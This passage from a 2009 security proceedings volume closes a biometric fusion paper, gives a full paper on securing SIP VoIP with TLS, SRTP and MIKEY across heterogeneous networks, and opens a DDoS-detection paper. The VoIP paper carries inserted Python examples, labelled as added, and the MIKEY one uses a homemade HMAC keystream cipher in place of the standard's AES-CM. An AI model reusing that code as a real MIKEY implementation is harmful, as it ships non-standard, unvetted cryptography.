Testing: A pair of fingerprint and ear images is used for testing. Genuine and impostor matching scores are generated by testing the first client against itself and against the remaining subjects. The fused feature vector generated from a pair of fingerprint and ear images is compared with the gallery feature vectors. A rank based method is adopted to exhibit the overall performance of the proposed feature level fusion. Matching is performed between a probe fused vector and its own encoded version in the database and also with the rest of the encoded fused vectors in the database. The proposed multimodal system is able to identify a specific person in the entire database, and ranks are found in terms of the matching probability obtained. The subjects are retrieved from the database according to their matching scores. The identification rate for the proposed system is 98.71%, while those for fingerprint and ear biometrics are 95.02% and 93.63% respectively, as shown in Figure 3.

Fig. 3. Cumulative Match Characteristics Curves: identification probability (CMC) against rank k, from 5 to 50, for ear identification, fingerprint identification and feature level multimodal identification.
7 Conclusion

This paper has presented a feature level fusion technique of fingerprint and ear biometrics for human identification. The technique uses the SIFT descriptor for invariant feature extraction from the fingerprint and ear modalities and the PAM K-medoids algorithm for feature reduction. The reduced feature set reflects higher matching proximity with relevant information. Doddington's user-dependent weighting scheme has been adopted, extending the existing notions with adaptive weighting applied to the matching scores. The performance of the technique has been determined on a multimodal database containing fingerprint and ear images. The results show significant improvements in identification performance over fingerprint and ear biometrics alone as well as over the existing feature level fusion scheme [2] which used SIFT as the feature descriptor. The technique not only attains higher accuracy, but also reflects robustness in the identification of individuals.
References
1. Ross, A., Nandakumar, K., Jain, A.K.: Handbook of Multibiometrics. Springer, Heidelberg (2006)
2. Rattani, A., Kisku, D.R., Bicego, M., Tistarelli, M.: Robust Feature-Level Multibiometrics Classification. In: IEEE Biometric Consortium Conference, Biometrics Symposium, pp. 1–6 (2006)
3. Bustard, J.D., Nixon, M.S.: Robust 2D Ear Registration and Recognition based on SIFT Point Matching. In: International Conference on Biometrics: Theory, Applications, and Systems (2008)
4. Maltoni, D., Maio, D., Jain, A.K., Prabhakar, S.: Handbook of Fingerprint Recognition, 2nd edn. Springer, Heidelberg (2009)
5. Li, S.Z., Jain, A.K. (eds.): Handbook of Face Recognition. Springer, Heidelberg (2005)
6. Lowe, D.G.: Object Recognition from Local Scale-Invariant Features. In: International Conference on Computer Vision, pp. 1150–1157 (1999)
7. Kaufman, L., Rousseeuw, P.J.: Finding Groups in Data: An Introduction to Cluster Analysis. Wiley, New York (1990)
8. Snelick, R., Uludag, U., Mink, A., Indovina, M., Jain, A.: Large Scale Evaluation of Multimodal Biometric Authentication Using State-of-the-Art Systems. IEEE Transactions on Pattern Analysis and Machine Intelligence 27(3), 450–455 (2005)
9. Chang, K., Bowyer, K.W., Sarkar, S.: Comparison and Combination of Ear and Face Images in Appearance-based Biometrics. IEEE Transactions on Pattern Analysis and Machine Intelligence 25(9) (2003)
A Study on the Interworking for SIP-Based Secure VoIP Communication with Security Protocols in the Heterogeneous Network
Seokung Yoon 1, Hyuncheol Jung 1, and Kyung-Seok Lee 2
1 Korea Internet & Security Agency, IT Venture Tower, Jungdaero 135, Songpa-gu, Seoul, Korea 138-950, {seokung, hcjung}@kisa.or.kr
2 Dept. of Computer Science, Graduate School of Soongsil Univ., 511 Sangdo-dong, Dongjak-gu, Seoul, Korea 156-743, [email protected]
Abstract. VoIP will become more and more popular around the world, but security vulnerabilities such as eavesdropping and disclosure of private information could stand in the way of VoIP revitalization. It is necessary to protect signaling and media information along the whole path. In the real world it is not easy to provide end-to-end secure VoIP communication because of the heterogeneous network. In this situation we have to consider network interworking between SIP-based VoIP and PSTN or mobile networks. This paper analyzes interworking scenarios for secure communication and proposes a method to provide secure communication with security protocols such as TLS, SRTP and MIKEY in the heterogeneous network.
Keywords: VoIP, OPTIONS Method, MIKEY, Heterogeneous Network.
1 Introduction
VoIP (Voice over Internet Protocol) is poised to take over from the century-old public switched telephone network (PSTN). Numerous protocols have been authored that carry various forms of real-time multimedia session data such as voice, video, or text messages. SIP (Session Initiation Protocol) [1] is an IETF standard protocol that works in concert with these protocols. VoIP has security vulnerabilities such as eavesdropping, Denial of Service (DoS), service abuse, session hijacking and VoIP spam. Eavesdropping in particular is a major issue that must be solved urgently. SIP-based VoIP specifies security mechanisms to protect user privacy from eavesdropping. HTTP digest [2] provides user-to-user and user-to-proxy authentication. TLS [3] provides integrity and confidentiality of SIP signaling messages. SRTP (Secure Real-time Transport Protocol) [4] provides a framework for encryption and message authentication of RTP streams. MIKEY [5] has been proposed in the IETF as a key management protocol for multimedia data encryption and is considered the key management protocol for SRTP. MIKEY protects a master key with a pre-shared key or the responder's public key. To use MIKEY for exchanging a master key, it is important to know to whom the initiator speaks. The initiator also has to know whether the responder supports security protocols. But in a heterogeneous network it is not easy to know the responder's capability, because there are legacy devices or devices that adopt different security protocols. In this situation the initiator cannot carry out secure communication because it does not know the responder's capability. This could lead to security vulnerabilities and therefore should be addressed. This paper analyzes the security mechanism to negotiate SIP signaling security and MIKEY as a key management protocol for multimedia data encryption. It also analyzes interworking scenarios for secure communication and proposes a method to provide secure communication with security protocols such as TLS, SRTP and MIKEY in the heterogeneous network. With this study, we will protect SIP-based VoIP with MIKEY in the heterogeneous network.
D. Ślęzak et al. (Eds.): SecTech 2009, CCIS 58, pp. 165–175, 2009. © Springer-Verlag Berlin Heidelberg 2009
2 SIP-Based Secure VoIP Communication
Fig. 1 shows the SIP-based secure VoIP communication flow. The procedure for SIP-based secure VoIP communication is as follows. Firstly, the security mechanism negotiation to protect SIP signaling messages is executed sequentially using the OPTIONS method between the IP phone and the SIP proxy, between SIP proxies, and between the SIP proxy and the IP phone. After the security mechanism negotiation, each entity establishes a TLS session. Secondly, the sender starts call setup with an INVITE message containing the master key derived from MIKEY to encrypt and authenticate the media traffic. Finally, a secure media channel (SRTP) is created.
Fig. 1. SIP-based VoIP secure communication flow
3 OPTIONS Method (RFC3329)
3.1 Overview of Operation
To carry out secure communication, it is necessary to negotiate security protocols. The IETF recommends the OPTIONS [6] method to support this. Fig. 2 illustrates how the mechanism works.
Fig. 2. Security agreement message flow
Step 1: Clients wishing to use this specification can send a list of their supported security mechanisms along with the first request to the server.
Step 2: Servers wishing to use this specification can challenge the client to perform the security agreement procedure. The security mechanisms and parameters supported by the server are sent along in this challenge.
Step 3: The client then proceeds to select the highest-preference security mechanism they have in common and to turn on the selected security.
Step 4: The client contacts the server again, now using the selected security mechanism. The server's list of supported security mechanisms is returned as a response to the challenge.
Step 5: The server verifies its own list of security mechanisms in order to ensure that the original list had not been modified.
3.2 Client Initiated
Fig. 3 illustrates how a UA negotiates the security mechanism to be used with its server without knowing beforehand which mechanisms the proxy supports. The OPTIONS method can be used here to request the security capabilities of the server. In this way, security can be initiated even before the first INVITE is sent via the server. Fig. 4 shows an example of the OPTIONS message exchange.
Fig. 3. Negotiation Initiated by the Client
(1) OPTIONS sip:proxy.example.com SIP/2.0
    Security-Client: tls
    Security-Client: digest
    Require: sec-agree
    Proxy-Require: sec-agree
(2) 494 Security Agreement Required
    Security-Server: ipsec-ike;q=0.1
    Security-Server: tls;q=0.2
(3) INVITE sip:proxy.example.com SIP/2.0
    Security-Verify: ipsec-ike;q=0.1
    Security-Verify: tls;q=0.2
    Route: sip:[email protected]
    Require: sec-agree
    Proxy-Require: sec-agree
Fig. 4. OPTIONS message example
The UAC sends an OPTIONS request to its server, indicating at the same time that it is able to negotiate security mechanisms and that it supports TLS and HTTP Digest. The server responds to the UAC with its own list of security mechanisms - IPsec and TLS. The only common security mechanism is TLS, so they establish a TLS connection between them. When the connection is successfully established, the UAC sends an INVITE request over the TLS connection just established. This INVITE contains the server's security list. The server verifies it, and since it matches its static list, it processes the INVITE and forwards it to the next hop.
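The negotiation just described, worked through in Python as an added example (this is not code from the paper or from RFC 3329): it parses the Security-Client/Security-Server header values with their q-values, performs the step-3 selection of the highest-preference mechanism both sides share, and performs the step-5 check in which the server compares the Security-Verify list echoed by the client against its own static list. The header values are taken from Fig. 4; the tie-break by client order and the interpretation of a missing q-value as 0 are assumptions of this example.

```python
"""RFC 3329 security agreement (Sect. 3), worked through in Python."""
from dataclasses import dataclass
from typing import List, Optional


@dataclass(frozen=True)
class Mechanism:
    name: str        # mechanism-name, e.g. "tls", "digest", "ipsec-ike"
    q: float = 0.0   # q-value: the sender's preference, higher is preferred


def parse_security_header(values: List[str]) -> List[Mechanism]:
    """Parse repeated Security-Client/-Server/-Verify header values such as
    "tls;q=0.2". Unknown parameters are ignored; a missing q-value counts as 0."""
    mechanisms = []
    for value in values:
        parts = [p.strip() for p in value.split(";")]
        q = 0.0
        for param in parts[1:]:
            key, _, raw = param.partition("=")
            if key.strip().lower() == "q":
                q = float(raw)
        mechanisms.append(Mechanism(parts[0].lower(), q))
    return mechanisms


def select_mechanism(client: List[Mechanism], server: List[Mechanism]) -> Optional[str]:
    """Step 3: pick the highest-preference mechanism both sides support.
    The server's q-values decide the preference; ties keep the client's order."""
    client_names = [m.name for m in client]
    common = [m for m in server if m.name in client_names]
    if not common:
        return None      # nothing in common: no protected path can be set up
    best = max(common, key=lambda m: (m.q, -client_names.index(m.name)))
    return best.name


def verify_echoed_list(static_list: List[Mechanism], echoed: List[Mechanism]) -> bool:
    """Step 5: the server compares the Security-Verify list echoed by the client
    with its own static list. Any difference (an entry missing, added or
    re-weighted) shows that the 494 challenge was altered on the path, so the
    request must be rejected instead of being served over a weaker mechanism."""
    return sorted(static_list, key=lambda m: m.name) == sorted(echoed, key=lambda m: m.name)


# Constructed header values mirroring the Fig. 4 exchange.
CLIENT_OFFER = parse_security_header(["tls", "digest"])
SERVER_STATIC = parse_security_header(["ipsec-ike;q=0.1", "tls;q=0.2"])


def run_exchange(security_verify: List[str]) -> dict:
    """Steps 1-5 for one client; `security_verify` is what the client echoes
    back in its INVITE (step 4)."""
    selected = select_mechanism(CLIENT_OFFER, SERVER_STATIC)
    verified = verify_echoed_list(SERVER_STATIC, parse_security_header(security_verify))
    return {"selected": selected, "verified": verified}


if __name__ == "__main__":
    print(run_exchange(["ipsec-ike;q=0.1", "tls;q=0.2"]))   # intact: tls selected, verified
    print(run_exchange(["ipsec-ike;q=0.1"]))                 # tls entry missing: rejected
```

The second call shows why step 5 matters: if the echoed list lacks an entry the server originally advertised, the server must not process the INVITE, because the client may have been steered to a weaker mechanism than the server would have chosen.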
4 MIKEY (RFC3830)
4.1 System Overview
One objective of MIKEY is to produce a Data Security Association (Data SA) for the security protocol, including a Traffic-Encrypting Key (TEK), which is derived from a TEK Generation Key (TGK) and used as input for the security protocol. MIKEY supports establishing keys and parameters for more than one security protocol (or for several instances of the same security protocol) at the same time. The concept of a Crypto Session Bundle (CSB) denotes a collection of one or more Crypto Sessions that can have a common TGK and security parameters but obtain distinct TEKs from MIKEY.
4.2 Basic Key Transport and Exchange Methods
MIKEY defines three different methods of transporting/establishing a TGK: with a pre-shared key, with public-key encryption, and with a Diffie-Hellman (DH) key exchange. The pre-shared key method and the public-key method are both key transport mechanisms, where the actual TGK is pushed (securely) to the recipient(s). In the Diffie-Hellman method, the TGK is instead derived from the Diffie-Hellman values exchanged between the peers. The following general notation is used:
- HDR: The general MIKEY header, which includes MIKEY CSB related data and information mapping to the specific security protocol used.
- T: The timestamp, used mainly to prevent replay attacks.
- IDx: The identity of entity x (IDi = Initiator, IDr = Responder).
- RAND: Random/pseudo-random byte string, which is always included in the first message from the Initiator.
- SP: The security policies for the data security protocol.
4.2.1 Pre-Shared Key (PSK)
In this method, the pre-shared secret key, s, is used to derive key material for both the encryption (encr_key) and the integrity protection (auth_key) of the MIKEY messages. As shown in Fig. 5(a), the main objective of the Initiator's message (I_MESSAGE) is to transport one or more TGKs (carried in KEMAC) and a set of security parameters (SPs) to the Responder in a secure manner. As the verification message from the Responder is optional, the Initiator indicates in the HDR whether it requires a verification message from the Responder.
KEMAC = E(encr_key, {TGK}) || MAC    (1)
The KEMAC payload contains a set of encrypted sub-payloads and a MAC. Each sub-payload includes a TGK randomly and independently chosen by the Initiator. The MAC is a Message Authentication Code covering the entire MIKEY message using the authentication key, auth_key. The main objective of the verification message from the Responder is to obtain mutual authentication. The verification message, V, is a MAC computed over the Responder's entire message, the timestamp and the two party identities, using the authentication key.
4.2.2 Public-Key Encryption (PKE)
As in the previous case, the main objective of the Initiator's message is to transport one or more TGKs and a set of security parameters to the Responder in a secure manner (Fig. 5(b)). This is done using an envelope approach, where the TGKs are encrypted with keys derived from a randomly/pseudo-randomly chosen "envelope key". The envelope key is sent to the Responder encrypted with the Responder's public key. The PKE payload contains the encrypted envelope key: PKE = E(PKr, env_key). It is encrypted using the Responder's public key (PKr). If the Responder possesses several public keys, the Initiator can indicate the key used in the CHASH payload. The KEMAC contains a set of encrypted sub-payloads and a MAC:
KEMAC = E(encr_key, IDi || {TGK}) || MAC    (2)
The first payload (IDi) in KEMAC is the identity of the Initiator. Each of the following payloads (TGK) includes a TGK randomly and independently chosen by the Initiator. The encrypted part is followed by a MAC, which is calculated over the KEMAC payload. The encr_key and the auth_key are derived from the envelope key. SIGNi is a signature covering the entire MIKEY message, using the Initiator's signature key. The main objective of the verification message from the Responder is to obtain mutual authentication. As the verification message V from the Responder is optional, the Initiator indicates in the HDR whether it requires one. V is calculated in the same way as in the pre-shared key mode.
4.2.3 Diffie-Hellman (D-H) Key Exchange
This method creates a DH key, which is used as the TGK. It cannot be used to create group keys; it can only create single peer-to-peer keys. The main objective of the Initiator's message is to provide the Responder, in a secure way, with its DH value (DHi) g^(xi), where xi MUST be randomly/pseudo-randomly and secretly chosen, together with a set of security protocol parameters (Fig. 5(c)). SIGNi is a signature covering the Initiator's MIKEY message, I_MESSAGE, using the Initiator's signature key. The main objective of the Responder's message is to provide the Initiator, in a secure way, with the Responder's value (DHr) g^(xr), where xr MUST be randomly/pseudo-randomly and secretly chosen. The timestamp included in the answer is the same as the one in the Initiator's message. SIGNr is a signature covering the Responder's MIKEY message, R_MESSAGE, using the Responder's signature key. The DH group parameters are chosen by the Initiator and signaled to the Responder. Both parties calculate the TGK, g^(xi*xr), from the exchanged DH values.
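The pre-shared key mode of Sect. 4.2.1, worked through as an added example (not code from the paper or from RFC 3830). It keeps the message structure described above: encr_key and auth_key are derived from s and RAND, KEMAC = E(encr_key, {TGK}) || MAC with the MAC covering the entire I_MESSAGE (Eq. (1)), and V is a MAC over the Responder's message, the timestamp and both identities. Two substitutions are assumptions of this example so that it runs on the standard library alone: HMAC-SHA256 stands in for the RFC 3830 PRF, and an HMAC-derived keystream stands in for AES-CM; the HDR contents, identities and the TGK are constructed values.

```python
"""MIKEY pre-shared-key mode (Sect. 4.2.1, Eq. (1)) and the verification message V."""
import hashlib
import hmac
import os
import struct
from dataclasses import dataclass
from typing import Optional, Tuple

MAC_LEN = 32   # HMAC-SHA256 output; used for both the KEMAC MAC and V


def derive_key(s: bytes, rand: bytes, label: bytes) -> bytes:
    """encr_key / auth_key from the pre-shared key s and RAND.
    Stand-in for the RFC 3830 PRF (an assumption of this example)."""
    return hmac.new(s, label + rand, hashlib.sha256).digest()


def keystream_xor(key: bytes, nonce: bytes, data: bytes) -> bytes:
    """Symmetric encryption by XOR with an HMAC-derived keystream.
    Stand-in for the AES-CM that RFC 3830 specifies (an assumption of this example)."""
    stream, block = b"", 0
    while len(stream) < len(data):
        stream += hmac.new(key, nonce + struct.pack(">I", block), hashlib.sha256).digest()
        block += 1
    return bytes(a ^ b for a, b in zip(data, stream))


@dataclass
class IMessage:
    """I_MESSAGE = HDR, T, RAND, [IDi], [IDr], {SP}, KEMAC (Fig. 5a)."""
    hdr: bytes
    t: int              # timestamp T, as an integer count of time units
    rand: bytes
    idi: bytes
    idr: bytes
    sp: bytes
    kemac: bytes = b""

    def prefix(self) -> bytes:
        """All payloads before KEMAC, in transmission order."""
        return self.hdr + struct.pack(">Q", self.t) + self.rand + self.idi + self.idr + self.sp


def compute_v(auth_key: bytes, msg: IMessage) -> bytes:
    """V = MAC over the Responder's entire message (HDR, T, [IDr]), the timestamp
    and the two party identities, using auth_key."""
    r_message = b"HDR:psk:resp" + struct.pack(">Q", msg.t) + msg.idr
    return hmac.new(auth_key, r_message + struct.pack(">Q", msg.t) + msg.idi + msg.idr,
                    hashlib.sha256).digest()


def initiator_build(s: bytes, idi: bytes, idr: bytes, tgk: bytes, sp: bytes,
                    t: int, rand: Optional[bytes] = None) -> IMessage:
    rand = rand if rand is not None else os.urandom(16)
    encr_key = derive_key(s, rand, b"encr")
    auth_key = derive_key(s, rand, b"auth")
    msg = IMessage(b"HDR:psk:V-required", t, rand, idi, idr, sp)
    encrypted_tgk = keystream_xor(encr_key, rand, tgk)
    # Eq. (1): KEMAC = E(encr_key, {TGK}) || MAC, the MAC covering the entire message.
    mac = hmac.new(auth_key, msg.prefix() + encrypted_tgk, hashlib.sha256).digest()
    msg.kemac = encrypted_tgk + mac
    return msg


def responder_process(s: bytes, msg: IMessage, now: int,
                      max_skew: int) -> Optional[Tuple[bytes, bytes]]:
    """Verify the MAC and the timestamp, then recover the TGK and compute V.
    Returns None for a tampered or stale/replayed message."""
    encr_key = derive_key(s, msg.rand, b"encr")
    auth_key = derive_key(s, msg.rand, b"auth")
    encrypted_tgk, mac = msg.kemac[:-MAC_LEN], msg.kemac[-MAC_LEN:]
    expected = hmac.new(auth_key, msg.prefix() + encrypted_tgk, hashlib.sha256).digest()
    if not hmac.compare_digest(mac, expected):
        return None                 # integrity failure: nothing from this message is used
    if abs(now - msg.t) > max_skew:
        return None                 # T outside the replay window
    tgk = keystream_xor(encr_key, msg.rand, encrypted_tgk)
    return tgk, compute_v(auth_key, msg)


def initiator_verify(s: bytes, msg: IMessage, v: bytes) -> bool:
    """The Initiator checks V, completing mutual authentication."""
    return hmac.compare_digest(v, compute_v(derive_key(s, msg.rand, b"auth"), msg))


def demo() -> dict:
    """Constructed run: honest exchange, a bit-flipped KEMAC, and a stale T."""
    s = b"constructed-pre-shared-key-for-the-example"
    tgk = bytes(range(16))                       # constructed 128-bit TGK
    t = 1_700_000_000
    msg = initiator_build(s, b"IDi:terminal", b"IDr:gateway", tgk, b"SP:srtp", t, rand=b"\x42" * 16)
    result = responder_process(s, msg, now=t + 5, max_skew=1_000)
    tampered = IMessage(msg.hdr, msg.t, msg.rand, msg.idi, msg.idr, msg.sp,
                        bytes([msg.kemac[0] ^ 0x01]) + msg.kemac[1:])
    return {
        "tgk_recovered": result is not None and result[0] == tgk,
        "v_verified": result is not None and initiator_verify(s, msg, result[1]),
        "tampered_rejected": responder_process(s, tampered, t + 5, 1_000) is None,
        "stale_rejected": responder_process(s, msg, t + 10_000, 1_000) is None,
    }
```

The order of checks in responder_process is the point worth noticing: the MAC is verified before any decryption or use of T, so a message that fails integrity never influences the Responder's state, and the timestamp window is what turns T into a replay defence.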
(a) Initiator: I_MESSAGE = HDR, T, RAND, [IDi], [IDr], {SP}, KEMAC; Responder: R_MESSAGE = HDR, T, [IDr], V
(b) Initiator: I_MESSAGE = HDR, T, RAND, [IDi|CERTi], [IDr], {SP}, KEMAC, [CHAS…; Responder: R_MESSAGE = HDR, T, [IDr], V
(c) Initiator: I_MESSAGE = HDR, T, RAND, [IDi|CERTi], [IDr], {SP}, DHi, SIGNi; Responder: R_MESSAGE = HDR, T, [IDr|CERTr], IDi, D…
Fig. 5. The MIKEY message (a) PSK (b) PKE (c) D-H key exchange
5 Secure Communication Interworking Scenarios
In this study, a heterogeneous network means a VoIP network interconnected via the PSTN or a mobile network. In a heterogeneous network, the SIP-based VoIP gateway has to provide functions to handle SIP messages. The scope of secure communication can be decided using OPTIONS and its response messages:
(1) If the terminal or gateway supports the OPTIONS method and the security protocols, the response message is 494.
(2) If the terminal or gateway supports only the OPTIONS method and not the security protocols, the response message is 488.
(3) If the terminal or gateway supports neither the OPTIONS method nor the security protocols, the response message is 200 or another value.
In cases (2) and (3), we assume that the terminal or gateway of the next hop does not have the security protocols. In this situation, the initiator has to create the MIKEY message with the gateway of the previous hop and carry out secure communication with it. The following scenarios use TLS for SIP signaling security and SRTP for multimedia data encryption.
5.1 Partial Secure Communication Ⅰ
Fig. 6 illustrates the partial secure communication scenario in which the responder terminal does not support the security protocols or is on the PSTN, and the other entities support the security protocols. The gray-painted part denotes the PSTN-interconnected VoIP network. In this scenario, each entity sends OPTIONS messages to the next hop and at the same time returns 494 responses to the previous hop. But the PSTN returns a 200 OK message or an error message when it receives an OPTIONS message. The initiator learns the scope of secure communication from the response messages and creates the MIKEY message using the pre-shared key or public key of the gateway. The gateway in the responder network has interworking functions to encrypt or decrypt the messages in support of this scenario.
Fig. 6. Partial secure communication between initiator and gateway
5.2 Partial Secure Communication Ⅱ
Fig. 7 illustrates the partial secure communication scenario in which the initiator terminal does not support the security protocols or is on the PSTN, and the remaining entities support the security protocols. In this scenario, the gateway in the initiator network has to create the OPTIONS message and send it to the next hop. The gateway learns the scope of secure communication from the response messages and creates the MIKEY message using the pre-shared key or public key of the responder.
Fig. 7. Partial secure communication between gateway and receiver terminal
Fig. 8. Partial secure communication between gateways
5.3 Partial Secure Communication Ⅲ
Fig. 8 illustrates the partial secure communication scenario in which neither the initiator nor the responder terminal supports the security protocols (or they are on the PSTN), and the remaining entities support the security protocols. Most enterprises use VoIP services in this way. To protect the relatively vulnerable Internet area, secure communication should be provided between the gateways. The gateway in the initiator network has to create the OPTIONS message and send it to the next hop. As a result, the gateway learns the scope of secure communication from the response messages and creates the MIKEY message using the pre-shared key or public key of the gateway in the responder network.
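The decision rule behind the three scenarios, written out as an added example (not the paper's or any product's code). Each entity on the path is represented by the status code it returns to an OPTIONS probe, mapped by rules (1) to (3) of Sect. 5; the secure leg then starts at the first security-capable entity (the terminal in Sect. 5.1, the gateway in Sects. 5.2 and 5.3) and ends at the last capable entity before the first hop that answers 488 or 200, which becomes the MIKEY peer. Modelling the initiator's own terminal by the code it would itself return is a simplification of this example, and the entity names are constructed.

```python
"""Scope of secure communication from OPTIONS responses (Sect. 5)."""
from dataclasses import dataclass
from typing import List, Optional, Tuple


@dataclass
class Hop:
    name: str
    options_status: int   # status code the entity returns to an OPTIONS probe


def capability(status: int) -> str:
    """The paper's three rules for interpreting an OPTIONS response."""
    if status == 494:
        return "secure"         # (1) OPTIONS and the security protocols are supported
    if status == 488:
        return "options-only"   # (2) OPTIONS understood, but no security protocols
    return "legacy"             # (3) 200 OK or anything else: neither (PSTN/mobile side)


def secure_scope(path: List[Hop]) -> Optional[Tuple[str, str]]:
    """Return the (MIKEY initiator, MIKEY responder) pair bounding the secure
    leg, or None when no leg can be protected.

    The leg starts at the first security-capable entity and ends at the last
    capable entity before a hop answering 488/200: that hop is assumed to lack
    the security protocols, so the MIKEY message goes to the previous gateway."""
    capable = [capability(h.options_status) == "secure" for h in path]
    if True not in capable:
        return None
    start = capable.index(True)
    end = start
    while end + 1 < len(path) and capable[end + 1]:
        end += 1
    if end == start:
        return None             # a lone capable entity has nobody to key with
    return path[start].name, path[end].name


# Constructed paths for the three scenarios of Sect. 5.
SCENARIO_1 = [Hop("initiator-terminal", 494), Hop("initiator-proxy", 494),
              Hop("initiator-gateway", 494), Hop("responder-gateway", 494),
              Hop("responder-terminal", 200)]                                # Fig. 6
SCENARIO_2 = [Hop("initiator-terminal", 200), Hop("initiator-gateway", 494),
              Hop("responder-proxy", 494), Hop("responder-terminal", 494)]   # Fig. 7
SCENARIO_3 = [Hop("initiator-terminal", 488), Hop("initiator-gateway", 494),
              Hop("responder-gateway", 494), Hop("responder-terminal", 200)] # Fig. 8

if __name__ == "__main__":
    for label, path in (("5.1", SCENARIO_1), ("5.2", SCENARIO_2), ("5.3", SCENARIO_3)):
        print(label, secure_scope(path))
```

Because only 494 counts as capable, a hop that merely understands OPTIONS (488) terminates the leg exactly like a PSTN gateway that answers 200, which is the assumption the paper states for cases (2) and (3).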
6 Conclusion
Due to VoIP vulnerabilities such as eavesdropping and disclosure of private information, it is necessary to protect signaling and media information. But in the real world it is not easy to provide end-to-end secure VoIP communication because of the heterogeneous network. In this situation we have to consider network interworking between SIP-based VoIP and PSTN or mobile networks. This paper analyzed the security mechanism to negotiate SIP signaling security and MIKEY as a key management protocol for multimedia data encryption. It also analyzed interworking scenarios for secure communication and proposed a method to provide secure communication with security protocols such as TLS, SRTP and MIKEY in the heterogeneous network. With this study, we will protect SIP-based VoIP with MIKEY in the heterogeneous network. We implemented security protocols such as TLS, SRTP and MIKEY in the terminal, proxy and gateway, and verified the above scenarios in an experimental network interconnected with a VoIP service network; we found no issues regarding these scenarios.
Acknowledgments. This work was supported by the IT R&D program of MKE/KEIT [2008-S-028-02, The Development of SIP-Aware Intrusion Prevention Technique for protecting SIP-based Application Services].
References
[1] Rosenberg, J., Schulzrinne, H., Camarillo, G., Johnston, A., Sparks, R., Handley, M., Schooler, E.: SIP: Session Initiation Protocol, RFC 3261, Internet Engineering Task Force (June 2002)
[2] Franks, J., Hallam-Baker, P., Hostetler, J., Lawrence, S., Leach, P., Luotonen, A., Stewart, L.: HTTP Authentication: Basic and Digest Access Authentication, Internet Engineering Task Force (June 1999)
[3] Dierks, T., Allen, C.: The TLS Protocol Version 1.0, RFC 2246, Internet Engineering Task Force (January 1999)
[4] Baugher, M., Carrara, E., Lindholm, F., Naslund, M., Norrman, K.: The Secure Real-time Transport Protocol (SRTP), RFC 3711, Internet Engineering Task Force (March 2004)
[5] Arkko, J., Carrara, E., Lindholm, F., Naslund, M., Norrman, K.: MIKEY: Multimedia Internet KEYing, RFC 3830, Internet Engineering Task Force (August 2004)
[6] Arkko, J., Torvinen, V., Camarillo, G., Niemi, A., Haukka, T.: Security Mechanism Agreement for the Session Initiation Protocol (SIP), RFC 3329, Internet Engineering Task Force (January 2003)
DDoS Attack Detection Using Three-State Partition Based on Flow Interaction
Jieren Cheng (1,2), Boyun Zhang (3), Jianping Yin (1), Yun Liu (1), and Zhiping Cai (1)
(1) School of Computer, National University of Defense Technology, 410073 Changsha, China
(2) Department of Mathematics, Xiangnan University, 423000 Chenzhou, China
(3) School of Information Science and Engineering, Central South University, Changsha, 410083, China
[email protected]
Abstract. It is challenging to detect Distributed Denial of Service (DDoS) attacks accurately and quickly. We propose a novel IP Flow Interaction Behavior Feature (IFF) algorithm based on IP flow interaction via IP addresses and ports. IFF can be designed to provide normal profiles for normal flow and to reflect the essential features created by different types of DDoS attacks. Using IFF, we partition the network flow states into three states: the health state, the quasi health state and the abnormal state. Based on this three-state partition, we present a simple and efficient DDoS attack detection method via a self-adapting dual threshold and an alarm evaluation mechanism (DASA). Our experimental results demonstrate that IFF can be used as a general DDoS attack diagnosis feature, and that DASA can effectively detect abnormal flows containing DDoS attack flow with higher accuracy and a lower false alarm rate in a short detection time.
Keywords: Network Security, Distributed Denial of Service, IP Flow Interaction, Three-State Partition.
1 Introduction
Accurate and quick detection is essential to minimize the damage of distributed denial of service (DDoS) attacks. DDoS attacks have become more difficult to detect accurately, because they tend to use actual source IP addresses [1] and can seriously damage the victims by using periodic, non-suspicious low-rate attack flows [2]. Moreover, it is difficult to perform real-time detection of network anomalies effectively for large-scale traffic. This paper proposes the IP Flow Interaction Behavior Feature (IFF) to quantify the state features of network flows according to the interaction between DDoS attack flow and normal flow. Based on a three-state partition of network flow states, we build an efficient detection model (DASA) for DDoS attacks using a self-adapting dual threshold on the IFF time series of normal flows and an alarm evaluation mechanism. The experimental results demonstrate that IFF is a reliable, validated diagnosis feature for DDoS attacks, and that DASA can recognize the abnormal phenomena caused by DDoS attack flows and realize quick and efficient detection with lower false positive and false negative rates.
D. Ślęzak et al. (Eds.): SecTech 2009, CCIS 58, pp. 176–184, 2009. © Springer-Verlag Berlin Heidelberg 2009
2 Related Work
Methods based on abrupt traffic change are the most popular [3,4], but the traffic offset cannot distinguish DDoS attack flow from a normal flash crowd. Moreover, by following the statistical features of normal flow, an attacker can perform a DDoS attack and avoid detection by organizing many different attacking sources, for example in a low-rate DDoS attack. Methods based on flow dissymmetry [5,6] can recognize dissymmetric attack flow effectively, whereas the incoming and outgoing rates of normal flow are sometimes not balanced. What is more, attackers may launch an attack using randomly spoofed source IP addresses, or simulate legitimate users to send out attack packets from many attack sources without losing the power of the attack. Methods based on the distribution of attacking sources [7,8] generate high false negatives when the attack flows are contained in large normal flows. The method in [9] established detection models based on many statistical features of normal flow and can detect all kinds of attacks; however, it is difficult to establish a stable model for different kinds of normal flows. The methods in [10] adopt distributed collaborative sensors to detect and defend against attacks, but the system is difficult to deploy and the detection quality relies on the ability of each sensor. Methods based on multiple characteristics [11,12,13] have many advantages over detection methods based on a single attack characteristic. However, their detection capability is disturbed by large normal flows because they cannot separate attack flows from normal flows effectively.
3 IP Flow Interaction Feature
Interaction is a common characteristic of network flows, but it is essentially different between normal flow and DDoS attack flow. Given a network flow F at time span T, described as <(t1, s1, sp1, d1, dp1), (t2, s2, sp2, d2, dp2), …, (tn, sn, spn, dn, dpn)>, where for i = 1, 2, …, n, ti denotes the time stamp of the ith packet and si, spi, di, dpi represent the source IP address, source port, destination IP address and destination port of the ith packet, respectively.
Definition 1. Classify the n packets of F so that packets with the same source IP address and destination IP address are in the same class. Denote the class of packets with source IP address Ai as IPS(Ai), and the class of packets with destination IP address Aj as IPD(Aj). If a source IP address Ai makes both IPS(Ai) and IPD(Ai) non-empty, then IPS(Ai) is called an Interaction Flow (IF) and denoted IF(Ai). If a source IP address Ai makes IPD(Ai) empty, then IPS(Ai) is called a Source Half Interaction Flow (SH), denoted SH(Ai), and its number of different port numbers is denoted Port(SH(Ai)). If a destination IP address Ai makes IPS(Ai) empty, then IPD(Ai) is called a Destination Half Interaction Flow (DH), denoted DH(Ai), and its number of different port numbers is denoted Port(DH(Ai)). SH and DH are together called Half Interaction Flows (HF).
Definition 2. Classify the n packets of F and obtain all the IFs, denoted IF1, IF2, …, IFM, all the SHs, denoted SH1, SH2, …, SHS, and all the DHs, denoted DH1, DH2, …, DHD. We define the IP Flow Interaction Behavior Feature (IFF) as follows:

